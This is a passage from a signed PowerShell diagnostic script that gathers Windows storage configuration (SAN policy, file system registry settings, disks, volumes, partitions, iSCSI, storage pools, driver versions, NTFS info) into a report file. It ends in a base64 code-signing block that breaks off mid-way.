newly discovered disks remain offline and read-only.'} [SANPolicy] $sanPolicy = 0 $regKeySanPolicy = 'HKLM:\SYSTEM\CurrentControlSet\Services\partmgr\Parameters' if(Test-Path ($regKeySanPolicy)) { $sanPolicyRegValue = (Get-ItemProperty -Path $regKeySanPolicy -Name 'SanPolicy' -ErrorAction SilentlyContinue).SanPolicy if($sanPolicyRegValue) { '=============================================' | Out-File -FilePath $OutputFile -Append 'SAN Policy' | Out-File -FilePath $OutputFile -Append '=============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append $sanPolicy = [Enum]::ToObject([SANPolicy], $sanPolicyRegValue) "{0} ({1}): {2}" -f $sanPolicy.value__, $sanPolicy, ($sanPolicyDescriptions.Get_Item("$sanPolicy")) | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append 'Refer: https://msdn.microsoft.com/en-us/library/bb525577.aspx' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append } } # ============================================= # # File System Settings # ============================================= # $regKeyFileSystem = 'HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem' if(Test-Path ($regKeyFileSystem)) { '=============================================' | Out-File -FilePath $OutputFile -Append 'File System Settings' | Out-File -FilePath $OutputFile -Append '=============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append # Trim/UnMap Support $regValueDisableDeleteNotification = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem -Name 'DisableDeleteNotification' -ErrorAction SilentlyContinue if($regValueDisableDeleteNotification) { "{0, -38}: {1} (Trim/UnMap {2})" -f 'DisableDeleteNotification', ($regValueDisableDeleteNotification.DisableDeleteNotification), ` (('Disabled','Enabled')[$regValueDisableDeleteNotification.DisableDeleteNotification -eq 0]) | Out-File -FilePath $OutputFile -Append } # ODX Support $regValueFilterSupportedFeaturesMode = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem -Name 'FilterSupportedFeaturesMode' -ErrorAction SilentlyContinue if($regValueDisableDeleteNotification) { "{0, -38}: {1} (ODX {2})" -f 'FilterSupportedFeaturesMode', ($regValueFilterSupportedFeaturesMode.FilterSupportedFeaturesMode), ` (('Disabled','Enabled')[$regValueFilterSupportedFeaturesMode.FilterSupportedFeaturesMode -eq 0]) | Out-File -FilePath $OutputFile -Append } "`n" | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append 'Other values from "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem"' | Out-File -FilePath $OutputFile -Append Get-ItemProperty $regKeyFileSystem -ErrorAction SilentlyContinue | Format-List -Property NtfsAllowExtendedCharacter8dot3Rename, NtfsBugcheckOnCorrupt, NtfsDisable8dot3NameCreation, ` NtfsDisableCompression, NtfsDisableEncryption, NtfsDisableLastAccessUpdate, NtfsDisableLfsDowngrade, NtfsDisableVolsnapHints, NtfsEncryptPagingFile, NtfsMemoryUsage, ` NtfsMftZoneReservation, NtfsQuotaNotifyRate, ScrubMode, SymlinkLocalToLocalEvaluation, SymlinkLocalToRemoteEvaluation, SymlinkRemoteToLocalEvaluation, SymlinkRemoteToRemoteEvaluation, ` UdfsCloseSessionOnEject, UdfsSoftwareDefectManagement, Win31FileSystem, Win95TruncatedExtensions | Out-File -FilePath $OutputFile -Append } # ============================================= # # Disk Failure Prediction # ============================================= # '=============================================' | Out-File -FilePath $OutputFile -Append 'Disk Failure Prediction' | Out-File -FilePath $OutputFile -Append '=============================================' | Out-File -FilePath $OutputFile -Append Get-CimInstance -Namespace Root\WMI -Class MSStorageDriver_FailurePredictStatus -ErrorAction Silentlycontinue | Select-Object InstanceName, PredictFailure, Reason, Active | Format-Table -Wrap -AutoSize -GroupBy PredictFailure | Out-File -FilePath $OutputFile -Append if([Float]$OSVersion -lt [Float](6.2)) { # ============================================= # # Disk Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Disk Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append $items = @('Name', 'Index', 'Status', 'StatusInfo', 'Access', 'Availability', 'BlockSize', 'Bootable', 'BootPartition', 'ConfigManagerErrorCode', 'ConfigManagerUserConfig', 'Description', 'DeviceID', 'DiskIndex', 'ErrorCleared', 'ErrorDescription', 'ErrorMethodology', 'HiddenSectors', 'InstallDate', 'LastErrorCode', 'NumberOfBlocks', 'PowerManagementCapabilities', 'PowerManagementSupported', 'PrimaryPartition', 'Purpose', 'RewritePartition', 'Size', 'StartingOffset', 'Type', 'Properties') Get-CimInstance Win32_DiskPartition | Format-List $items | Out-File -FilePath $OutputFile -Append # ============================================= # # Volume Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Volume Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append $items = @('AddMountPoint', 'Chkdsk', 'Defrag', 'DefragAnalysis', 'Dismount', 'Format', 'Mount', 'Reset', 'SetPowerState', 'Access', 'Automount', 'Availability', 'BlockSize', 'BootVolume', 'Capacity', 'Caption', 'Compressed', 'ConfigManagerErrorCode', 'ConfigManagerUserConfig', 'CreationClassName', 'Description', 'DeviceID', 'DirtyBitSet', 'DriveLetter', 'DriveType', 'ErrorCleared', 'ErrorDescription', 'ErrorMethodology', 'FileSystem', 'FreeSpace', 'IndexingEnabled', 'InstallDate', 'Label', 'LastErrorCode', 'MaximumFileNameLength', 'Name', 'NumberOfBlocks', 'PageFilePresent', 'PNPDeviceID', 'PowerManagementCapabilities', 'PowerManagementSupported', 'Purpose', 'QuotasEnabled', 'QuotasIncomplete', 'QuotasRebuilding', 'SerialNumber', 'Status', 'StatusInfo', 'SupportsDiskQuotas', 'SupportsFileBasedCompression', 'SystemCreationClassName', 'SystemVolume') Get-CimInstance Win32_Volume | Format-List $items -GroupBy DeviceID | Out-File -FilePath $OutputFile -Append # ============================================= # # iSCSI Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'iSCSI Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append $MSiSCSI = Get-Service -Name MSiSCSI -ErrorAction SilentlyContinue if($MSiSCSI) { "`n" | Out-File -FilePath $OutputFile -Append "{0} is {1}" -f $MSiSCSI.DisplayName, $MSiSCSI.Status | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append } } else { # ============================================= # # Disk Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Disk Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append Get-Disk -ErrorAction SilentlyContinue | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueIdFormat | Format-List -GroupBy BusType | Out-File -FilePath $OutputFile -Append # ============================================= # # Volume Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Volume Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append $volumes = Get-Volume -ErrorAction SilentlyContinue "Total Volume(s) : $($volumes.Count)" | Out-File -FilePath $OutputFile -Append $volumes | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId | Format-List -GroupBy DriveType | Out-File -FilePath $OutputFile -Append # ============================================= # # Partition Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Partition Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append $partitions = Get-Partition -ErrorAction SilentlyContinue "Total Partition(s) : $($partitions.Count)" | Out-File -FilePath $OutputFile -Append $partitions | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId | Format-List -GroupBy DiskNumber | Out-File -FilePath $OutputFile -Append # ============================================= # # iSCSI Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'iSCSI Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append $MSiSCSI = Get-Service -Name MSiSCSI -ErrorAction SilentlyContinue if($MSiSCSI) { "`n" | Out-File -FilePath $OutputFile -Append "{0} is {1}" -f $MSiSCSI.DisplayName, $MSiSCSI.Status | Out-File -FilePath $OutputFile -Append } if($MSiSCSI.Status -eq 'Running') { Get-IscsiTarget | Format-List | Out-File -FilePath $OutputFile -Append Get-IscsiTargetPortal | Format-List | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append 'Initiator Ports' | Out-File -FilePath $OutputFile -Append '---------------' | Out-File -FilePath $OutputFile -Append Get-InitiatorPort | Format-Table -AutoSize | Out-File -FilePath $OutputFile -Append } else { "`n" | Out-File -FilePath $OutputFile -Append } # ============================================= # # Storage Subsystem # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'Storage Subsystem' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append Get-StorageSubsystem -ErrorAction SilentlyContinue | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId | Format-List | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append 'Storage Pool' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append Get-StoragePool | Select-Object * -ExcludeProperty CimSystemProperties, CimInstanceProperties, CimClass, PSComputerName, Path, PassThroughServer, PassThroughNamespace, PassThroughIds, PassThroughClass, ObjectId, UniqueId | Format-List | Out-File -FilePath $OutputFile -Append } # ============================================= # # Properties of Important Drivers # ============================================= # 'StorPort.sys', 'ScsiPort.sys', 'Classpnp.sys', 'Mountmgr.sys', 'VolSnap.sys', 'Ntfs.sys', 'PartMgr.sys', 'SpacePort.sys' | ForEach-Object { '==============================================' | Out-File -FilePath $OutputFile -Append "$_ Service Properties" | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append Get-ItemProperty -Path "$env:windir\System32\drivers\$_" -ErrorAction SilentlyContinue | Format-List -Property Name, Length, Mode, VersionInfo, LinkType, Target, CreationTime, LastWriteTime, LastAccessTime | Out-File -FilePath $OutputFile -Append} # ============================================= # # NTFS Information # ============================================= # '==============================================' | Out-File -FilePath $OutputFile -Append 'NTFS Information' | Out-File -FilePath $OutputFile -Append '==============================================' | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append [System.IO.DriveInfo]::GetDrives() | Where-Object {$_.DriveFormat -eq 'NTFS'} | Select-Object Name | ForEach-Object { "Volume {0} `n`n" -f $_.Name | Out-File -FilePath $OutputFile -Append FSUTIL fsinfo ntfsInfo ($_.Name) | Out-File -FilePath $OutputFile -Append "`n" | Out-File -FilePath $OutputFile -Append } "`n" | Out-File -FilePath $OutputFile -Append CollectFiles -filesToCollect $OutputFile -fileDescription $fileDescription -SectionDescription $sectionDescription # SIG # Begin signature block # MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCoZYf+QYWxL3dG # 7aRbdboIEI0dtSSHrEMio6I/snj6cKCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIQA # 2rAj28cmDpcZvuTQhxuVPxRDgBUojURy9PPqVlFsMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAhinhxpmfZWWl9Jt5ApySm7GytbmgW2lGVJxD # peYXmFTTCxnj1CVmRec7lPYGzz8/5t6J0FF+Q4y+YRkB9s5LBEEvSkWzgT2I+TTT # wyXqyf80TUuktGJuky1ESj4Sp6PK36cv4oNqCn4pQoPDlAul0SLDIsdElpVoMwQb # utjq0XS8KLym62jx8S6tOPuXQSSOr6V30T8J15wwvul5ME6vZMNZUc+Du0IGCX78 # 1aBM0vw/BMKOhnxjFxgiBBwrfVZpnJRsvZ39R0s4vfxCDN5giDr5wkqe3gnmzfCc # 9t2Qv6XdXZg4VN73Aycug85+paSHuMkOy9O4qwdUmLA0lRnq/6GCF5QwgheQBgor # BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCBqi+FNf8GeccTcvReu3LszbncNMhF7HP83 # C5vGeUvwWgIGZxqBxlgYGBMyMDI0MTAyODExNDA0My4xNTdaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046REMwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAehQsIDPK3KZTQAB # AAAB6DANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1MjJaFw0yNTAzMDUxODQ1MjJaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046REMwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDhQXdE0WzXG7wzeC9SGdH6 # eVwdGlF6YgpU7weOFBkpW9yuEmJSDE1ADBx/0DTuRBaplSD8CR1QqyQmxRDD/Cdv # DyeZFAcZ6l2+nlMssmZyC8TPt1GTWAUt3GXUU6g0F0tIrFNLgofCjOvm3G0j482V # utKS4wZT6bNVnBVsChr2AjmVbGDN/6Qs/EqakL5cwpGel1te7UO13dUwaPjOy0Wi # 1qYNmR8i7T1luj2JdFdfZhMPyqyq/NDnZuONSbj8FM5xKBoar12ragC8/1CXaL1O # MXBwGaRoJTYtksi9njuq4wDkcAwitCZ5BtQ2NqPZ0lLiQB7O10Bm9zpHWn9x1/Hm # dAn4koMWKUDwH5sd/zDu4vi887FWxm54kkWNvk8FeQ7ZZ0Q5gqGKW4g6revV2IdA # xBobWdorqwvzqL70WdsgDU/P5c0L8vYIskUJZedCGHM2hHIsNRyw9EFoSolDM+yC # edkz69787s8nIp55icLfDoKw5hak5G6MWF6d71tcNzV9+v9RQKMa6Uwfyquredd5 # sqXWCXv++hek4A15WybIc6ufT0ilazKYZvDvoaswgjP0SeLW7mvmcw0FELzF1/uW # aXElLHOXIlieKF2i/YzQ6U50K9dbhnMaDcJSsG0hXLRTy/LQbsOD0hw7FuK0nmzo # tSx/5fo9g7fCzoFjk3tDEwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFPo5W8o980kM # fRVQba6T34HwelLaMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCWfcJm2rwXtPi7 # 4km6PKAkni9+BWotq+QtDGgeT5F3ro7PsIUNKRkUytuGqI8thL3Jcrb03x6DOppY # JEA+pb6o2qPjFddO1TLqvSXrYm+OgCLL+7+3FmRmfkRu8rHvprab0O19wDbukgO8 # I5Oi1RegMJl8t5k/UtE0Wb3zAlOHnCjLGSzP/Do3ptwhXokk02IvD7SZEBbPboGb # tw4LCHsT2pFakpGOBh+ISUMXBf835CuVNfddwxmyGvNSzyEyEk5h1Vh7tpwP7z7r # J+HsiP4sdqBjj6Avopuf4rxUAfrEbV6aj8twFs7WVHNiIgrHNna/55kyrAG9Yt19 # CPvkUwxYK0uZvPl2WC39nfc0jOTjivC7s/IUozE4tfy3JNkyQ1cNtvZftiX3j5Dt # +eLOeuGDjvhJvYMIEkpkV68XLNH7+ZBfYa+PmfRYaoFFHCJKEoRSZ3PbDJPBiEhZ # 9yuxMddoMMQ19Tkyftot6Ez0XhSmwjYBq39DvBFWhlyDGBhrU3GteDWiVd9YGSB2 # WnxuFMy5fbAK6o8PWz8QRMiptXHK3HDBr2wWWEcrrgcTuHZIJTqepNoYlx9VRFvj # /vCXaAFcmkW1nk7VE+owaXr5RJjryDq9ubkyDq1mdrF/geaRALXcNZbfNXIkhXzX # A6a8CiamcQW/DgmLJpiVQNriZYCHIDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # 